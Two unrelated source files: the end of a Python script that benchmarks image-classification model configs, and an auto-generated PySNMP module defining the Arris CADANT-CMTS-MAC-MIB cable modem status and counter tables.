'repvgg_b3g4_infer_zcls_320',
'repvgg_b3g4_train_zcls_224',
'repvgg_b3g4_train_zcls_320',
'repvgg_d2se_infer_zcls_224',
'repvgg_d2se_infer_zcls_320',
'repvgg_d2se_train_zcls_224',
'repvgg_d2se_train_zcls_320',
]
# print(len(name_list), len(cfg_file_list))
assert len(name_list) == len(cfg_file_list)
for name, cfg_file in zip(name_list, cfg_file_list):
if '224' in cfg_file:
data_shape = (1, 3, 224, 224)
main(data_shape, cfg_file, name)
elif '320' in cfg_file:
data_shape = (1, 3, 320, 320)
main(data_shape, cfg_file, name)
else:
            raise ValueError(f'cannot determine input size (224 or 320) from config file name: {cfg_file}')
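# Benchmark SENet, SKNet and ResNeSt configs (zcls and official weights) at 224x224 input.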
def senet_sknet_resnest():
data_shape = (1, 3, 224, 224)
cfg_file_list = [
'configs/benchmarks/resnet/se_r50_zcls_imagenet_224.yaml',
'configs/benchmarks/resnet/sknet50_zcls_imagenet_224.yaml',
'configs/benchmarks/resnet/resnest50_fast_2s1x64d_zcls_imagenet_224.yaml',
'configs/benchmarks/resnet/resnest50_fast_2s1x64d_official_imagenet_224.yaml',
'configs/benchmarks/resnet/resnest50_zcls_imagenet_224.yaml',
'configs/benchmarks/resnet/resnest50_official_imagenet_224.yaml',
'configs/benchmarks/resnet/resnest101_zcls_imagenet_224.yaml',
'configs/benchmarks/resnet/resnest101_official_imagenet_224.yaml',
'configs/benchmarks/resnet/resnest200_zcls_imagenet_224.yaml',
'configs/benchmarks/resnet/resnest200_official_imagenet_224.yaml',
'configs/benchmarks/resnet/resnest269_zcls_imagenet_224.yaml',
'configs/benchmarks/resnet/resnest269_official_imagenet_224.yaml',
]
name_list = [
'se_r50_zcls_imagenet',
'sknet50_zcls_imagenet',
'resnest50_fast_2s1x64d_zcls',
'resnest50_fast_2s1x64d_official',
'resnest50_zcls',
'resnest50_official',
'resnest101_zcls',
'resnest101_official',
'resnest200_zcls',
'resnest200_official',
'resnest269_zcls',
'resnest269_official',
]
assert len(name_list) == len(cfg_file_list)
for name, cfg_file in zip(name_list, cfg_file_list):
main(data_shape, cfg_file, name)
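# Benchmark GhostNet config (x1.0, zcls weights) at 224x224 input.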
def ghostnet():
data_shape = (1, 3, 224, 224)
cfg_file_list = [
'configs/benchmarks/ghostnet/ghostnet_x1_0_zcls_imagenet_224.yaml',
]
name_list = [
'ghostnet_x1_0_zcls',
]
assert len(name_list) == len(cfg_file_list)
for name, cfg_file in zip(name_list, cfg_file_list):
main(data_shape, cfg_file, name)
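# Only the MobileNet benchmarks are enabled by default; uncomment the calls below to run the other model families.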
if __name__ == '__main__':
print('#' * 30)
mobilenet()
# print('#' * 30)
# shufflenet_v1()
# shufflenet_v2()
# print('#' * 30)
# resnet()
# print('#' * 30)
# repvgg()
# print('#' * 30)
# senet_sknet_resnest()
# print('#' * 30)
# ghostnet()
|
py | 7dface4af894fc23f137a8104e3139903cd390d7 | #
# PySNMP MIB module CADANT-CMTS-MAC-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CADANT-CMTS-MAC-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 17:27:15 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsUnion, ValueRangeConstraint, ValueSizeConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsUnion", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsIntersection")
CerOfdmModBitsType, OfdmProfileId = mibBuilder.importSymbols("CADANT-CMTS-DOWNCHANNEL-MIB", "CerOfdmModBitsType", "OfdmProfileId")
cadMacChlChannelIfIndex, cadIfMacDomainIfIndex = mibBuilder.importSymbols("CADANT-CMTS-LAYER2CMTS-MIB", "cadMacChlChannelIfIndex", "cadIfMacDomainIfIndex")
cadLayer2, = mibBuilder.importSymbols("CADANT-PRODUCTS-MIB", "cadLayer2")
CadCpeDeviceTypes, OUIAddress, InetAddressIPv4or6 = mibBuilder.importSymbols("CADANT-TC", "CadCpeDeviceTypes", "OUIAddress", "InetAddressIPv4or6")
TenthdB, DocsisQosVersion, DocsisUpstreamType, DocsisVersion, TenthdBmV = mibBuilder.importSymbols("DOCS-IF-MIB", "TenthdB", "DocsisQosVersion", "DocsisUpstreamType", "DocsisVersion", "TenthdBmV")
ChSetId, RcpId, IfDirection = mibBuilder.importSymbols("DOCS-IF3-MIB", "ChSetId", "RcpId", "IfDirection")
docsQosServiceFlowSidClusterId, docsQosServiceClassEntry, BitRate, docsQosServiceFlowId = mibBuilder.importSymbols("DOCS-QOS3-MIB", "docsQosServiceFlowSidClusterId", "docsQosServiceClassEntry", "BitRate", "docsQosServiceFlowId")
InterfaceIndex, ifIndex, InterfaceIndexOrZero = mibBuilder.importSymbols("IF-MIB", "InterfaceIndex", "ifIndex", "InterfaceIndexOrZero")
InetAddressIPv4, InetAddressIPv6, InetAddressType = mibBuilder.importSymbols("INET-ADDRESS-MIB", "InetAddressIPv4", "InetAddressIPv6", "InetAddressType")
ipNetToMediaEntry, = mibBuilder.importSymbols("IP-MIB", "ipNetToMediaEntry")
SnmpAdminString, = mibBuilder.importSymbols("SNMP-FRAMEWORK-MIB", "SnmpAdminString")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
Unsigned32, iso, Bits, TimeTicks, Gauge32, MibIdentifier, NotificationType, IpAddress, Counter32, MibScalar, MibTable, MibTableRow, MibTableColumn, Integer32, ModuleIdentity, Counter64, ObjectIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "Unsigned32", "iso", "Bits", "TimeTicks", "Gauge32", "MibIdentifier", "NotificationType", "IpAddress", "Counter32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Integer32", "ModuleIdentity", "Counter64", "ObjectIdentity")
DisplayString, RowStatus, MacAddress, TruthValue, DateAndTime, TextualConvention, TimeStamp = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "RowStatus", "MacAddress", "TruthValue", "DateAndTime", "TextualConvention", "TimeStamp")
cadMacMib = ModuleIdentity((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2))
cadMacMib.setRevisions(('2015-09-08 00:00', '2015-06-05 00:00', '2015-04-14 00:00', '2015-04-06 00:00', '2015-04-01 00:00', '2015-03-03 00:00', '2014-11-25 00:00', '2014-09-23 00:00', '2014-05-31 00:00', '2014-02-13 00:00', '2013-06-20 00:00', '2013-06-12 00:00', '2013-05-14 00:00', '2013-05-09 00:00', '2013-04-29 00:00', '2012-11-30 00:00', '2012-11-26 00:00', '2012-08-01 00:00', '2012-06-27 00:00', '2011-05-05 00:00', '2010-11-23 00:00', '2010-10-12 00:00', '2010-08-31 00:00', '2010-05-24 00:00', '2010-05-13 00:00', '2010-02-08 00:00', '2009-08-26 00:00', '2009-08-19 00:00', '2009-04-08 00:00', '2009-03-25 00:00', '2009-03-04 00:00', '2009-02-12 00:00', '2009-01-26 00:00', '2009-01-05 00:00', '2008-11-17 00:00', '2008-02-01 00:00', '2007-09-06 00:00', '2007-08-30 00:00', '2007-08-08 00:00', '2006-09-19 00:00', '2006-09-12 00:00', '2006-08-11 00:00', '2006-07-17 00:00', '2006-04-06 00:00', '2006-01-30 00:00', '2006-01-05 00:00', '2006-01-03 00:00', '2005-12-12 00:00', '2005-10-19 00:00', '2005-10-18 00:00', '2005-10-14 00:00', '2005-10-07 00:00', '2005-10-05 00:00', '2005-10-03 00:00', '2005-08-10 00:00', '2005-07-11 00:00', '2005-07-01 00:00', '2004-12-03 00:00', '2004-11-12 00:00', '2004-02-28 00:00', '2003-10-16 00:00', '2003-09-24 00:00', '2003-07-29 00:00', '2003-06-23 00:00', '2003-06-20 00:00', '2003-04-14 00:00', '2003-01-06 00:00', '2002-11-11 00:00', '2002-10-10 00:00', '2002-09-23 00:00', '2002-09-19 00:00', '2002-08-28 00:00', '2002-06-05 00:00', '2001-05-22 00:00', '2001-05-03 00:00', '2001-04-03 00:00', '2001-02-05 00:00', '2000-09-24 00:00',))
if mibBuilder.loadTexts: cadMacMib.setLastUpdated('201509080000Z')
if mibBuilder.loadTexts: cadMacMib.setOrganization('Arris Group, Inc.')
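# CadIfCmtsCmStatusType: enumeration of CMTS-observed cable modem registration states
# (ranging, DHCP, config file download, registration, operational, forwarding disabled, etc.).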
class CadIfCmtsCmStatusType(TextualConvention, Integer32):
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 17, 18, 20))
namedValues = NamedValues(("other", 1), ("ranging", 2), ("rangingAborted", 3), ("rangingComplete", 4), ("ipComplete", 5), ("registrationComplete", 6), ("accessDenied", 7), ("operational", 8), ("registeredBPIInitializing", 9), ("startEae", 10), ("startDhcpv4", 11), ("startDhcpv6", 12), ("dhcpv6Complete", 13), ("startConfigFileDownload", 14), ("configFileComplete", 15), ("forwardingDisabled", 17), ("rfMuteAll", 18), ("netAccessDisabled", 20))
cadIfCmtsCmStatusNumber = MibScalar((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusNumber.setStatus('current')
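# cadIfCmtsCmStatusTable: per-cable-modem status and flap/penalty statistics, indexed by the CM MAC address.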
cadIfCmtsCmStatusTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2), )
if mibBuilder.loadTexts: cadIfCmtsCmStatusTable.setStatus('current')
cadIfCmtsCmStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsCmStatusMacAddress"))
if mibBuilder.loadTexts: cadIfCmtsCmStatusEntry.setStatus('current')
cadIfCmtsCmStatusMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 2), MacAddress())
if mibBuilder.loadTexts: cadIfCmtsCmStatusMacAddress.setStatus('current')
cadIfCmtsCmStatusDownChannelIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 4), InterfaceIndexOrZero()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusDownChannelIfIndex.setStatus('current')
cadIfCmtsCmStatusUpChannelIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 5), InterfaceIndexOrZero()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusUpChannelIfIndex.setStatus('current')
cadIfCmtsCmStatusValue = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 9), CadIfCmtsCmStatusType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusValue.setStatus('current')
cadIfCmtsCmStatusDocsisVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 12), DocsisVersion().clone('docsis10')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusDocsisVersion.setStatus('deprecated')
cadIfCmtsCmStatusRangFlaps = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 13), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusRangFlaps.setStatus('current')
cadIfCmtsCmStatusProvFlaps = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 14), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusProvFlaps.setStatus('current')
cadIfCmtsCmStatusRegFlaps = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 15), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusRegFlaps.setStatus('current')
cadIfCmtsCmStatusLastFlapTime = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 16), TimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusLastFlapTime.setStatus('current')
cadIfCmtsCmStatusInitRangTime = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 17), TimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusInitRangTime.setStatus('current')
cadIfCmtsCmStatusPreFlapStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 18), CadIfCmtsCmStatusType().clone(1)).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusPreFlapStatus.setStatus('current')
cadIfCmtsCmStatusConfigFilename = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 19), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusConfigFilename.setStatus('current')
cadIfCmtsCmStatusBpiVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 20), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("bpi", 0), ("bpiPlus", 1))).clone('bpi')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusBpiVersion.setStatus('current')
cadIfCmtsCmStatusModemType = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 21), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3))).clone(namedValues=NamedValues(("unknown", 0), ("standalone", 1), ("mta", 2), ("ccm", 3))).clone('unknown')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusModemType.setStatus('current')
cadIfCmtsCmStatusModulationType = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 22), DocsisUpstreamType().clone('tdma')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusModulationType.setStatus('current')
cadIfCmtsCmStatusCmPtr = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 23), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusCmPtr.setStatus('current')
cadIfCmtsCmStatusTftpEnforceFailed = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 24), TruthValue().clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusTftpEnforceFailed.setStatus('current')
cadIfCmtsCmStatusDynamicSecretFailed = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 25), TruthValue().clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusDynamicSecretFailed.setStatus('current')
cadIfCmtsCmStatusDocsCapability = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 26), DocsisVersion().clone('docsis10')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusDocsCapability.setStatus('current')
cadIfCmtsCmStatusDocsProvisioned = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 27), DocsisVersion().clone('docsis10')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusDocsProvisioned.setStatus('current')
cadIfHVCmtsCmStatusLastFlapTime = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 28), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfHVCmtsCmStatusLastFlapTime.setStatus('current')
cadIfHVCmtsCmStatusInitRangTime = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 29), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfHVCmtsCmStatusInitRangTime.setStatus('current')
cadIf3CmtsCmRegStatusIPv6Addr = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 30), InetAddressIPv6()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmRegStatusIPv6Addr.setStatus('current')
cadIf3CmtsCmRegStatusIPv6LinkLocal = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 31), InetAddressIPv6()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmRegStatusIPv6LinkLocal.setStatus('current')
cadIf3CmtsCmRegStatusMdIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 32), InterfaceIndexOrZero()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmRegStatusMdIfIndex.setStatus('current')
cadIf3CmtsCmRegStatusMdCmSgId = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 33), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmRegStatusMdCmSgId.setStatus('current')
cadIf3CmtsCmRegStatusRcpId = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 34), RcpId().clone(hexValue="0000000000")).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmRegStatusRcpId.setStatus('current')
cadIf3CmtsCmRegStatusRccStatusId = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 35), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmRegStatusRccStatusId.setStatus('current')
cadIf3CmtsCmRegStatusRcsId = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 36), ChSetId()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmRegStatusRcsId.setStatus('current')
cadIf3CmtsCmRegStatusTcsId = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 37), ChSetId()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmRegStatusTcsId.setStatus('current')
cadIf3CmtsCmRegStatusLastRegTime = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 38), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmRegStatusLastRegTime.setStatus('current')
cadIfCmtsCmStatusInetIpAddrType = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 39), InetAddressType().clone('ipv4')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusInetIpAddrType.setStatus('current')
cadIfCmtsCmStatusInetIpAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 40), InetAddressIPv4or6().clone(hexValue="")).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusInetIpAddress.setStatus('current')
cadIf3CmtsCmRegStatusServiceType = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 41), DocsisQosVersion()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmRegStatusServiceType.setStatus('current')
cadIfCmtsCmStatusBpiEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 42), TruthValue().clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusBpiEnabled.setStatus('current')
cadIfCmtsCmStatuseDocsisTypes = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 43), CadCpeDeviceTypes()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatuseDocsisTypes.setStatus('current')
cadIfCmtsCmStatusDsPenalties = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 44), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusDsPenalties.setStatus('current')
cadIfCmtsCmStatusUsPenalties = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 45), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusUsPenalties.setStatus('current')
cadIfCmtsCmStatusLastDsPenaltyStart = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 46), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusLastDsPenaltyStart.setStatus('current')
cadIfCmtsCmStatusLastDsPenaltyDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 47), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusLastDsPenaltyDuration.setStatus('current')
cadIfCmtsCmStatusLastUsPenaltyStart = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 48), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusLastUsPenaltyStart.setStatus('current')
cadIfCmtsCmStatusLastUsPenaltyDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 49), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusLastUsPenaltyDuration.setStatus('current')
cadIfCmtsCmStatusRxAcPowerLost = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 50), TruthValue().clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusRxAcPowerLost.setStatus('current')
cadIfCmtsCmStatusInsertionFlaps = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 51), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusInsertionFlaps.setStatus('current')
cadIf3CmtsCmRegStatusEnergyMgtCapability = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 52), Bits().clone(namedValues=NamedValues(("em1x1Mode", 0)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmRegStatusEnergyMgtCapability.setStatus('current')
cadIf3CmtsCmRegStatusEnergyMgtEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 53), Bits().clone(namedValues=NamedValues(("em1x1Mode", 0)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmRegStatusEnergyMgtEnabled.setStatus('current')
cadIf3CmtsCmRegStatusEnergyMgtOperStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 54), Bits().clone(namedValues=NamedValues(("em1x1Mode", 0)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmRegStatusEnergyMgtOperStatus.setStatus('current')
cadIf3CmtsCmStatsEm1x1ModeTotalDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 55), Unsigned32()).setUnits('seconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmStatsEm1x1ModeTotalDuration.setStatus('current')
cadIf3CmtsCmStatsEm1x1ModeEntryTime = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 56), Unsigned32()).setUnits('seconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmStatsEm1x1ModeEntryTime.setStatus('current')
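# cadIfCmtsCmCountsTable: per-CM, per-upstream-channel PHY counters (RX power, timing offset, SNR, FEC counts),
# indexed by CM MAC address and upstream channel ifIndex.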
cadIfCmtsCmCountsTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 3), )
if mibBuilder.loadTexts: cadIfCmtsCmCountsTable.setStatus('current')
cadIfCmtsCmCountsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 3, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsCmStatusMacAddress"), (0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsCmCountsUpChIfIndex"))
if mibBuilder.loadTexts: cadIfCmtsCmCountsEntry.setStatus('current')
cadIfCmtsCmCountsRxPower = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 3, 1, 1), TenthdBmV()).setUnits('dBmV').setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmCountsRxPower.setStatus('current')
cadIfCmtsCmCountsTimingOffset = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 3, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmCountsTimingOffset.setStatus('current')
cadIfCmtsCmCountsEqualizationData = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 3, 1, 3), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmCountsEqualizationData.setStatus('current')
cadIfCmtsCmCountsRangeReqOpportunities = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 3, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmCountsRangeReqOpportunities.setStatus('current')
cadIfCmtsCmCountsRangeReqReceived = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 3, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmCountsRangeReqReceived.setStatus('current')
cadIfCmtsCmCountsPowerAdjExceedsThreshold = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 3, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmCountsPowerAdjExceedsThreshold.setStatus('current')
cadIfCmtsCmCountsUpChIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 3, 1, 7), InterfaceIndex())
if mibBuilder.loadTexts: cadIfCmtsCmCountsUpChIfIndex.setStatus('current')
cadIfCmtsCmCountsSignalNoise = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 3, 1, 8), TenthdB()).setUnits('TenthdB').setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmCountsSignalNoise.setStatus('current')
cadIfCmtsCmCountsUnerroreds = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 3, 1, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmCountsUnerroreds.setStatus('current')
cadIfCmtsCmCountsCorrecteds = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 3, 1, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmCountsCorrecteds.setStatus('current')
cadIfCmtsCmCountsUncorrectables = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 3, 1, 11), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmCountsUncorrectables.setStatus('current')
cadIfCmtsCmCountsTxPower = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 3, 1, 12), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmCountsTxPower.setStatus('current')
cadIfCmtsServiceTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 4), )
if mibBuilder.loadTexts: cadIfCmtsServiceTable.setStatus('current')
cadIfCmtsServiceEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 4, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsServiceId"))
if mibBuilder.loadTexts: cadIfCmtsServiceEntry.setStatus('current')
cadIfCmtsServiceId = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 4, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 16383))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsServiceId.setStatus('current')
cadIfCmtsServiceMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 4, 1, 2), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsServiceMacAddress.setStatus('current')
